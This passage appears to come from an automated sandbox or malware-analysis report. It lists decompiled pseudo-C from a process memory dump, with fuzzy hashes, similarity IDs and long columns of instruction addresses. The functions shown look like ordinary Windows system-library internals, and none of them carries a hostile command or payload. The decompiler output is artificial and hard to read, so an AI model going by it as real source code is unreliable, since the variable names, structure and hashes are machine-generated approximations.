                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                        • API String ID: 0-1757540487
                        • Opcode ID: fa30695ed7f288398fef717da26e4485389c77749d0beb31322e039ece29ae22
                        • Instruction ID: 6edfdad6c575a71f96c76c98757d068acfb20e79dc82b8c697f053ac88ad3609
                        • Opcode Fuzzy Hash: fa30695ed7f288398fef717da26e4485389c77749d0beb31322e039ece29ae22
                        • Instruction Fuzzy Hash: 6251A1715083459BCB24DF24C440AABB3E9EF88718F4509AEFA85E7240F734D908CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E02C5E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v40;
                        				char _v44;
                        				intOrPtr _v48;
                        				signed int _v52;
                        				unsigned int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				signed int _v72;
                        				void* __ebx;
                        				void* __edi;
                        				char _t87;
                        				signed int _t90;
                        				signed int _t94;
                        				signed int _t100;
                        				intOrPtr* _t113;
                        				signed int _t122;
                        				void* _t132;
                        				void* _t135;
                        				signed int _t139;
                        				signed int* _t141;
                        				signed int _t146;
                        				signed int _t147;
                        				void* _t153;
                        				signed int _t155;
                        				signed int _t159;
                        				char _t166;
                        				void* _t172;
                        				void* _t176;
                        				signed int _t177;
                        				intOrPtr* _t179;
                        
                        				_t179 = __ecx;
                        				_v48 = __edx;
                        				_v68 = 0;
                        				_v72 = 0;
                        				_push(__ecx[1]);
                        				_push( *__ecx);
                        				_push(0);
                        				_t153 = 0x14;
                        				_t135 = _t153;
                        				_t132 = E02C5BBBB(_t135, _t153);
                        				if(_t132 == 0) {
                        					_t166 = _v68;
                        					goto L43;
                        				} else {
                        					_t155 = 0;
                        					_v52 = 0;
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					_v56 = __ecx[1];
                        					if( *__ecx >> 8 < 2) {
                        						_t155 = 1;
                        						_v52 = 1;
                        					}
                        					_t139 = _a4;
                        					_t87 = (_t155 << 0xc) + _t139;
                        					_v60 = _t87;
                        					if(_t87 < _t139) {
                        						L11:
                        						_t166 = _v68;
                        						L12:
                        						if(_t132 != 0) {
                        							E02C5BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                        						}
                        						L43:
                        						if(_v72 != 0) {
                        							_push( *((intOrPtr*)(_t179 + 4)));
                        							_push( *_t179);
                        							_push(0x8000);
                        							E02C5AFDE( &_v72,  &_v60);
                        						}
                        						L46:
                        						return _t166;
                        					}
                        					_t90 =  *(_t179 + 0xc) & 0x40000000;
                        					asm("sbb edi, edi");
                        					_t172 = ( ~_t90 & 0x0000003c) + 4;
                        					if(_t90 != 0) {
                        						_push(0);
                        						_push(0x14);
                        						_push( &_v44);
                        						_push(3);
                        						_push(_t179);
                        						_push(0xffffffff);
                        						if(E02BD9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                        							_push(_t139);
                        							E02C5A80D(_t179, 1, _v40, 0);
                        							_t172 = 4;
                        						}
                        					}
                        					_t141 =  &_v72;
                        					if(E02C5A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                        						_v64 = _a4;
                        						_t94 =  *(_t179 + 0xc) & 0x40000000;
                        						asm("sbb edi, edi");
                        						_t176 = ( ~_t94 & 0x0000003c) + 4;
                        						if(_t94 != 0) {
                        							_push(0);
                        							_push(0x14);
                        							_push( &_v24);
                        							_push(3);
                        							_push(_t179);
                        							_push(0xffffffff);
                        							if(E02BD9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                        								_push(_t141);
                        								E02C5A80D(_t179, 1, _v20, 0);
                        								_t176 = 4;
                        							}
                        						}
                        						if(E02C5A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                        							goto L11;
                        						} else {
                        							_t177 = _v64;
                        							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                        							_t100 = _v52 + _v52;
                        							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                        							 *(_t132 + 0x10) = _t146;
                        							asm("bsf eax, [esp+0x18]");
                        							_v52 = _t100;
                        							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                        							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                        							_t47 =  &_a8;
                        							 *_t47 = _a8 & 0x00000001;
                        							if( *_t47 == 0) {
                        								E02BB2280(_t179 + 0x30, _t179 + 0x30);
                        							}
                        							_t147 =  *(_t179 + 0x34);
                        							_t159 =  *(_t179 + 0x38) & 1;
                        							_v68 = 0;
                        							if(_t147 == 0) {
                        								L35:
                        								E02BAB090(_t179 + 0x34, _t147, _v68, _t132);
                        								if(_a8 == 0) {
                        									E02BAFFB0(_t132, _t177, _t179 + 0x30);
                        								}
                        								asm("lock xadd [eax], ecx");
                        								asm("lock xadd [eax], edx");
                        								_t132 = 0;
                        								_v72 = _v72 & 0;
                        								_v68 = _v72;
                        								if(E02BB7D50() == 0) {
                        									_t113 = 0x7ffe0388;
                        								} else {
                        									_t177 = _v64;
                        									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        								}
                        								if( *_t113 == _t132) {
                        									_t166 = _v68;
                        									goto L46;
                        								} else {
                        									_t166 = _v68;
                        									E02C4FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                        									goto L12;
                        								}
                        							} else {
                        								L23:
                        								while(1) {
                        									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                        										_t122 =  *_t147;
                        										if(_t159 == 0) {
                        											L32:
                        											if(_t122 == 0) {
                        												L34:
                        												_v68 = 0;
                        												goto L35;
                        											}
                        											L33:
                        											_t147 = _t122;
                        											continue;
                        										}
                        										if(_t122 == 0) {
                        											goto L34;
                        										}
                        										_t122 = _t122 ^ _t147;
                        										goto L32;
                        									}
                        									_t122 =  *(_t147 + 4);
                        									if(_t159 == 0) {
                        										L27:
                        										if(_t122 != 0) {
                        											goto L33;
                        										}
                        										L28:
                        										_v68 = 1;
                        										goto L35;
                        									}
                        									if(_t122 == 0) {
                        										goto L28;
                        									}
                        									_t122 = _t122 ^ _t147;
                        									goto L27;
                        								}
                        							}
                        						}
                        					}
                        					_v72 = _v72 & 0x00000000;
                        					goto L11;
                        				}
                        			}




































                        0x02c5e547
                        0x02c5e549
                        0x02c5e54f
                        0x02c5e553
                        0x02c5e557
                        0x02c5e55a
                        0x02c5e55c
                        0x02c5e55f
                        0x02c5e561
                        0x02c5e567
                        0x02c5e56b
                        0x02c5e7e2
                        0x00000000
                        0x02c5e571
                        0x02c5e575
                        0x02c5e577
                        0x02c5e57b
                        0x02c5e57c
                        0x02c5e57d
                        0x02c5e57e
                        0x02c5e57f
                        0x02c5e588
                        0x02c5e58f
                        0x02c5e591
                        0x02c5e592
                        0x02c5e592
                        0x02c5e596
                        0x02c5e59e
                        0x02c5e5a0
                        0x02c5e5a6
                        0x02c5e61d
                        0x02c5e61d
                        0x02c5e621
                        0x02c5e623
                        0x02c5e630
                        0x02c5e630
                        0x02c5e7e6
                        0x02c5e7eb
                        0x02c5e7ed
                        0x02c5e7f4
                        0x02c5e7fa
                        0x02c5e7ff
                        0x02c5e7ff
                        0x02c5e80a
                        0x02c5e812
                        0x02c5e812
                        0x02c5e5ab
                        0x02c5e5b4
                        0x02c5e5b9
                        0x02c5e5be
                        0x02c5e5c0
                        0x02c5e5c2
                        0x02c5e5c8
                        0x02c5e5c9
                        0x02c5e5cb
                        0x02c5e5cc
                        0x02c5e5d5
                        0x02c5e5e4
                        0x02c5e5f1
                        0x02c5e5f8
                        0x02c5e5f8
                        0x02c5e5d5
                        0x02c5e602
                        0x02c5e616
                        0x02c5e63d
                        0x02c5e644
                        0x02c5e64d
                        0x02c5e652
                        0x02c5e657
                        0x02c5e659
                        0x02c5e65b
                        0x02c5e661
                        0x02c5e662
                        0x02c5e664
                        0x02c5e665
                        0x02c5e66e
                        0x02c5e67d
                        0x02c5e68a
                        0x02c5e691
                        0x02c5e691
                        0x02c5e66e
                        0x02c5e6b0
                        0x00000000
                        0x02c5e6b6
                        0x02c5e6bd
                        0x02c5e6c7
                        0x02c5e6d7
                        0x02c5e6d9
                        0x02c5e6db
                        0x02c5e6de
                        0x02c5e6e3
                        0x02c5e6f3
                        0x02c5e6fc
                        0x02c5e700
                        0x02c5e700
                        0x02c5e704
                        0x02c5e70a
                        0x02c5e70a
                        0x02c5e713
                        0x02c5e716
                        0x02c5e719
                        0x02c5e720
                        0x02c5e761
                        0x02c5e76b
                        0x02c5e774
                        0x02c5e77a
                        0x02c5e77a
                        0x02c5e78a
                        0x02c5e791
                        0x02c5e799
                        0x02c5e79b
                        0x02c5e79f
                        0x02c5e7aa
                        0x02c5e7c0
                        0x02c5e7ac
                        0x02c5e7b2
                        0x02c5e7b9
                        0x02c5e7b9
                        0x02c5e7c7
                        0x02c5e806
                        0x00000000
                        0x02c5e7c9
                        0x02c5e7d1
                        0x02c5e7d8
                        0x00000000
                        0x02c5e7d8
                        0x00000000
                        0x00000000
                        0x02c5e722
                        0x02c5e72e
                        0x02c5e748
                        0x02c5e74c
                        0x02c5e754
                        0x02c5e756
                        0x02c5e75c
                        0x02c5e75c
                        0x00000000
                        0x02c5e75c
                        0x02c5e758
                        0x02c5e758
                        0x00000000
                        0x02c5e758
                        0x02c5e750
                        0x00000000
                        0x00000000
                        0x02c5e752
                        0x00000000
                        0x02c5e752
                        0x02c5e730
                        0x02c5e735
                        0x02c5e73d
                        0x02c5e73f
                        0x00000000
                        0x00000000
                        0x02c5e741
                        0x02c5e741
                        0x00000000
                        0x02c5e741
                        0x02c5e739
                        0x00000000
                        0x00000000
                        0x02c5e73b
                        0x00000000
                        0x02c5e73b
                        0x02c5e722
                        0x02c5e720
                        0x02c5e6b0
                        0x02c5e618
                        0x00000000
                        0x02c5e618

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction ID: ff2ce332369fd3b018fe1cabcc4279debdd94f3786f4e71b572d45342a359e73
                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction Fuzzy Hash: 1391AF712047519FE724CE25C840B1BB7E6BFC4758F14892DFAA9CB280EB74EA44CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02C151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed short* _t63;
                        				signed int _t64;
                        				signed int _t65;
                        				signed int _t67;
                        				intOrPtr _t74;
                        				intOrPtr _t84;
                        				intOrPtr _t88;
                        				intOrPtr _t94;
                        				void* _t100;
                        				void* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				short* _t108;
                        				signed int _t110;
                        				signed int _t113;
                        				signed int* _t115;
                        				signed short* _t117;
                        				void* _t118;
                        				void* _t119;
                        
                        				_push(0x80);
                        				_push(0x2c705f0);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                        				_t115 =  *(_t118 + 0xc);
                        				 *(_t118 - 0x7c) = _t115;
                        				 *((char*)(_t118 - 0x65)) = 0;
                        				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        				_t113 = 0;
                        				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                        				 *((intOrPtr*)(_t118 - 4)) = 0;
                        				_t100 = __ecx;
                        				if(_t100 == 0) {
                        					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        					E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *((char*)(_t118 - 0x65)) = 1;
                        					_t63 =  *(_t118 - 0x90);
                        					_t101 = _t63[2];
                        					_t64 =  *_t63 & 0x0000ffff;
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					L20:
                        					_t65 = _t64 >> 1;
                        					L21:
                        					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                        					if(_t108 == 0) {
                        						L27:
                        						 *_t115 = _t65 + 1;
                        						_t67 = 0xc0000023;
                        						L28:
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                        						L29:
                        						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                        						E02C153CA(0);
                        						return E02BED130(0, _t113, _t115);
                        					}
                        					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                        						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                        							 *_t108 = 0;
                        						}
                        						goto L27;
                        					}
                        					 *_t115 = _t65;
                        					_t115 = _t65 + _t65;
                        					E02BDF3E0(_t108, _t101, _t115);
                        					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                        					_t67 = 0;
                        					goto L28;
                        				}
                        				_t103 = _t100 - 1;
                        				if(_t103 == 0) {
                        					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                        					_t74 = E02BB3690(1, _t117, 0x2b71810, _t118 - 0x74);
                        					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                        					_t101 = _t117[2];
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					if(_t74 < 0) {
                        						_t64 =  *_t117 & 0x0000ffff;
                        						_t115 =  *(_t118 - 0x7c);
                        						goto L20;
                        					}
                        					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                        					_t115 =  *(_t118 - 0x7c);
                        					goto L21;
                        				}
                        				if(_t103 == 1) {
                        					_t105 = 4;
                        					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                        					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                        					_push(_t118 - 0x70);
                        					_push(0);
                        					_push(0);
                        					_push(_t105);
                        					_push(_t118 - 0x78);
                        					_push(0x6b);
                        					 *((intOrPtr*)(_t118 - 0x64)) = E02BDAA90();
                        					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        					_t113 = L02BB4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                        					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                        					if(_t113 != 0) {
                        						_push(_t118 - 0x70);
                        						_push( *((intOrPtr*)(_t118 - 0x70)));
                        						_push(_t113);
                        						_push(4);
                        						_push(_t118 - 0x78);
                        						_push(0x6b);
                        						_t84 = E02BDAA90();
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                        						if(_t84 < 0) {
                        							goto L29;
                        						}
                        						_t110 = 0;
                        						_t106 = 0;
                        						while(1) {
                        							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                        							 *(_t118 - 0x88) = _t106;
                        							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                        								break;
                        							}
                        							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                        							_t106 = _t106 + 1;
                        						}
                        						_t88 = E02C1500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                        						_t119 = _t119 + 0x1c;
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                        						if(_t88 < 0) {
                        							goto L29;
                        						}
                        						_t101 = _t118 - 0x3c;
                        						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                        						goto L21;
                        					}
                        					_t67 = 0xc0000017;
                        					goto L28;
                        				}
                        				_push(0);
                        				_push(0x20);
                        				_push(_t118 - 0x60);
                        				_push(0x5a);
                        				_t94 = E02BD9860();
                        				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                        				if(_t94 < 0) {
                        					goto L29;
                        				}
                        				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                        					_t101 = L"Legacy";
                        					_push(6);
                        				} else {
                        					_t101 = L"UEFI";
                        					_push(4);
                        				}
                        				_pop(_t65);
                        				goto L21;
                        			}






















                        0x02c151be
                        0x02c151c3
                        0x02c151c8
                        0x02c151cd
                        0x02c151d0
                        0x02c151d3
                        0x02c151d8
                        0x02c151db
                        0x02c151de
                        0x02c151e0
                        0x02c151e3
                        0x02c151e6
                        0x02c151e8
                        0x02c15342
                        0x02c15351
                        0x02c15356
                        0x02c1535a
                        0x02c15360
                        0x02c15363
                        0x02c15366
                        0x02c15369
                        0x02c15369
                        0x02c1536b
                        0x02c1536b
                        0x02c15370
                        0x02c153a3
                        0x02c153a4
                        0x02c153a6
                        0x02c153ab
                        0x02c153ab
                        0x02c153ae
                        0x02c153ae
                        0x02c153b5
                        0x02c153bf
                        0x02c153bf
                        0x02c15375
                        0x02c15396
                        0x02c153a0
                        0x02c153a0
                        0x00000000
                        0x02c15396
                        0x02c15377
                        0x02c15379
                        0x02c1537f
                        0x02c1538c
                        0x02c15390
                        0x00000000
                        0x02c15390
                        0x02c151ee
                        0x02c151f1
                        0x02c15301
                        0x02c15310
                        0x02c15315
                        0x02c15318
                        0x02c1531b
                        0x02c15320
                        0x02c1532e
                        0x02c15331
                        0x00000000
                        0x02c15331
                        0x02c15328
                        0x02c15329
                        0x00000000
                        0x02c15329
                        0x02c151fa
                        0x02c15235
                        0x02c15236
                        0x02c15239
                        0x02c1523f
                        0x02c15240
                        0x02c15241
                        0x02c15242
                        0x02c15246
                        0x02c15247
                        0x02c1524e
                        0x02c15251
                        0x02c15267
                        0x02c15269
                        0x02c1526e
                        0x02c1527d
                        0x02c1527e
                        0x02c15281
                        0x02c15282
                        0x02c15287
                        0x02c15288
                        0x02c1528a
                        0x02c1528f
                        0x02c15294
                        0x00000000
                        0x00000000
                        0x02c1529a
                        0x02c1529c
                        0x02c1529e
                        0x02c1529e
                        0x02c152a4
                        0x02c152b0
                        0x00000000
                        0x00000000
                        0x02c152ba
                        0x02c152bc
                        0x02c152bc
                        0x02c152d4
                        0x02c152d9
                        0x02c152dc
                        0x02c152e1
                        0x00000000
                        0x00000000
                        0x02c152e7
                        0x02c152f4
                        0x00000000
                        0x02c152f4
                        0x02c15270
                        0x00000000
                        0x02c15270
                        0x02c151fc
                        0x02c151fd
                        0x02c15202
                        0x02c15203
                        0x02c15205
                        0x02c1520a
                        0x02c1520f
                        0x00000000
                        0x00000000
                        0x02c1521b
                        0x02c15226
                        0x02c1522b
                        0x02c1521d
                        0x02c1521d
                        0x02c15222
                        0x02c15222
                        0x02c1522d
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: cec2f765de3ae34d1ffffb661d4e03a6e927c7030096d1d29f3a5a687d51088d
                        • Instruction ID: 44d31f8c8628ec007adb731457ad2c75f8aea0e16812d1c250b3c5bc453444ca
                        • Opcode Fuzzy Hash: cec2f765de3ae34d1ffffb661d4e03a6e927c7030096d1d29f3a5a687d51088d
                        • Instruction Fuzzy Hash: 09519CB2E006089FDB24CFA8C881BAEBBF9FF89744F94406DE519EB251D7719941DB10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02B9B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                        				signed int _t65;
                        				signed short _t69;
                        				intOrPtr _t70;
                        				signed short _t85;
                        				void* _t86;
                        				signed short _t89;
                        				signed short _t91;
                        				intOrPtr _t92;
                        				intOrPtr _t97;
                        				intOrPtr* _t98;
                        				signed short _t99;
                        				signed short _t101;
                        				void* _t102;
                        				char* _t103;
                        				signed short _t104;
                        				intOrPtr* _t110;
                        				void* _t111;
                        				void* _t114;
                        				intOrPtr* _t115;
                        
                        				_t109 = __esi;
                        				_t108 = __edi;
                        				_t106 = __edx;
                        				_t95 = __ebx;
                        				_push(0x90);
                        				_push(0x2c6f7a8);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                        				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                        				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                        				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                        				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                        				if(__edx == 0xffffffff) {
                        					L6:
                        					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                        					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) != 0) {
                        						L3:
                        						L4:
                        						return E02BED130(_t95, _t108, _t109);
                        					}
                        					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                        					_t108 = 0;
                        					_t109 = 0;
                        					_t95 = 0;
                        					__eflags = 0;
                        					while(1) {
                        						__eflags = _t95 - 0x200;
                        						if(_t95 >= 0x200) {
                        							break;
                        						}
                        						E02BDD000(0x80);
                        						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                        						_t108 = _t115;
                        						_t95 = _t95 - 0xffffff80;
                        						_t17 = _t114 - 4;
                        						 *_t17 =  *(_t114 - 4) & 0x00000000;
                        						__eflags =  *_t17;
                        						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t102 = _t110 + 1;
                        						do {
                        							_t85 =  *_t110;
                        							_t110 = _t110 + 1;
                        							__eflags = _t85;
                        						} while (_t85 != 0);
                        						_t111 = _t110 - _t102;
                        						_t21 = _t95 - 1; // -129
                        						_t86 = _t21;
                        						__eflags = _t111 - _t86;
                        						if(_t111 > _t86) {
                        							_t111 = _t86;
                        						}
                        						E02BDF3E0(_t108, _t106, _t111);
                        						_t115 = _t115 + 0xc;
                        						_t103 = _t111 + _t108;
                        						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                        						_t89 = _t95 - _t111;
                        						__eflags = _t89;
                        						_push(0);
                        						if(_t89 == 0) {
                        							L15:
                        							_t109 = 0xc000000d;
                        							goto L16;
                        						} else {
                        							__eflags = _t89 - 0x7fffffff;
                        							if(_t89 <= 0x7fffffff) {
                        								L16:
                        								 *(_t114 - 0x94) = _t109;
                        								__eflags = _t109;
                        								if(_t109 < 0) {
                        									__eflags = _t89;
                        									if(_t89 != 0) {
                        										 *_t103 = 0;
                        									}
                        									L26:
                        									 *(_t114 - 0xa0) = _t109;
                        									 *(_t114 - 4) = 0xfffffffe;
                        									__eflags = _t109;
                        									if(_t109 >= 0) {
                        										L31:
                        										_t98 = _t108;
                        										_t39 = _t98 + 1; // 0x1
                        										_t106 = _t39;
                        										do {
                        											_t69 =  *_t98;
                        											_t98 = _t98 + 1;
                        											__eflags = _t69;
                        										} while (_t69 != 0);
                        										_t99 = _t98 - _t106;
                        										__eflags = _t99;
                        										L34:
                        										_t70 =  *[fs:0x30];
                        										__eflags =  *((char*)(_t70 + 2));
                        										if( *((char*)(_t70 + 2)) != 0) {
                        											L40:
                        											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                        											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                        											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                        											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                        											 *(_t114 - 4) = 1;
                        											_push(_t114 - 0x74);
                        											L02BEDEF0(_t99, _t106);
                        											 *(_t114 - 4) = 0xfffffffe;
                        											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        											goto L3;
                        										}
                        										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                        										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                        											goto L40;
                        										}
                        										_push( *((intOrPtr*)(_t114 + 8)));
                        										_push( *((intOrPtr*)(_t114 - 0x9c)));
                        										_push(_t99 & 0x0000ffff);
                        										_push(_t108);
                        										_push(1);
                        										_t101 = E02BDB280();
                        										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                        										if( *((char*)(_t114 + 0x14)) == 1) {
                        											__eflags = _t101 - 0x80000003;
                        											if(_t101 == 0x80000003) {
                        												E02BDB7E0(1);
                        												_t101 = 0;
                        												__eflags = 0;
                        											}
                        										}
                        										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        										goto L4;
                        									}
                        									__eflags = _t109 - 0x80000005;
                        									if(_t109 == 0x80000005) {
                        										continue;
                        									}
                        									break;
                        								}
                        								 *(_t114 - 0x90) = 0;
                        								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                        								_t91 = E02BDE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                        								_t115 = _t115 + 0x10;
                        								_t104 = _t91;
                        								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                        								__eflags = _t104;
                        								if(_t104 < 0) {
                        									L21:
                        									_t109 = 0x80000005;
                        									 *(_t114 - 0x90) = 0x80000005;
                        									L22:
                        									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                        									L23:
                        									 *(_t114 - 0x94) = _t109;
                        									goto L26;
                        								}
                        								__eflags = _t104 - _t92;
                        								if(__eflags > 0) {
                        									goto L21;
                        								}
                        								if(__eflags == 0) {
                        									goto L22;
                        								}
                        								goto L23;
                        							}
                        							goto L15;
                        						}
                        					}
                        					__eflags = _t109;
                        					if(_t109 >= 0) {
                        						goto L31;
                        					}
                        					__eflags = _t109 - 0x80000005;
                        					if(_t109 != 0x80000005) {
                        						goto L31;
                        					}
                        					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                        					_t38 = _t95 - 1; // -129
                        					_t99 = _t38;
                        					goto L34;
                        				}
                        				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        					__eflags = __edx - 0x65;
                        					if(__edx != 0x65) {
                        						goto L2;
                        					}
                        					goto L6;
                        				}
                        				L2:
                        				_push( *((intOrPtr*)(_t114 + 8)));
                        				_push(_t106);
                        				if(E02BDA890() != 0) {
                        					goto L6;
                        				}
                        				goto L3;
                        			}






















                        0x02b9b171
                        0x02b9b171
                        0x02b9b171
                        0x02b9b171
                        0x02b9b171
                        0x02b9b176
                        0x02b9b17b
                        0x02b9b180
                        0x02b9b186
                        0x02b9b18f
                        0x02b9b198
                        0x02b9b1a4
                        0x02b9b1aa
                        0x02bf4802
                        0x02bf4802
                        0x02bf4805
                        0x02bf480c
                        0x02bf480e
                        0x02b9b1d1
                        0x02b9b1d3
                        0x02b9b1de
                        0x02b9b1de
                        0x02bf4817
                        0x02bf481e
                        0x02bf4820
                        0x02bf4822
                        0x02bf4822
                        0x02bf4824
                        0x02bf4824
                        0x02bf482a
                        0x00000000
                        0x00000000
                        0x02bf4835
                        0x02bf483a
                        0x02bf483d
                        0x02bf483f
                        0x02bf4842
                        0x02bf4842
                        0x02bf4842
                        0x02bf4846
                        0x02bf484c
                        0x02bf484e
                        0x02bf4851
                        0x02bf4851
                        0x02bf4853
                        0x02bf4854
                        0x02bf4854
                        0x02bf4858
                        0x02bf485a
                        0x02bf485a
                        0x02bf485d
                        0x02bf485f
                        0x02bf4861
                        0x02bf4861
                        0x02bf4866
                        0x02bf486b
                        0x02bf486e
                        0x02bf4871
                        0x02bf4876
                        0x02bf4876
                        0x02bf4878
                        0x02bf487b
                        0x02bf4884
                        0x02bf4884
                        0x00000000
                        0x02bf487d
                        0x02bf487d
                        0x02bf4882
                        0x02bf4889
                        0x02bf4889
                        0x02bf488f
                        0x02bf4891
                        0x02bf48e0
                        0x02bf48e2
                        0x02bf48e4
                        0x02bf48e4
                        0x02bf48e7
                        0x02bf48e7
                        0x02bf48ed
                        0x02bf48f4
                        0x02bf48f6
                        0x02bf4951
                        0x02bf4951
                        0x02bf4953
                        0x02bf4953
                        0x02bf4956
                        0x02bf4956
                        0x02bf4958
                        0x02bf4959
                        0x02bf4959
                        0x02bf495d
                        0x02bf495d
                        0x02bf495f
                        0x02bf495f
                        0x02bf4965
                        0x02bf4969
                        0x02bf49ba
                        0x02bf49ba
                        0x02bf49c1
                        0x02bf49c5
                        0x02bf49cc
                        0x02bf49d4
                        0x02bf49d7
                        0x02bf49da
                        0x02bf49e4
                        0x02bf49e5
                        0x02bf49f3
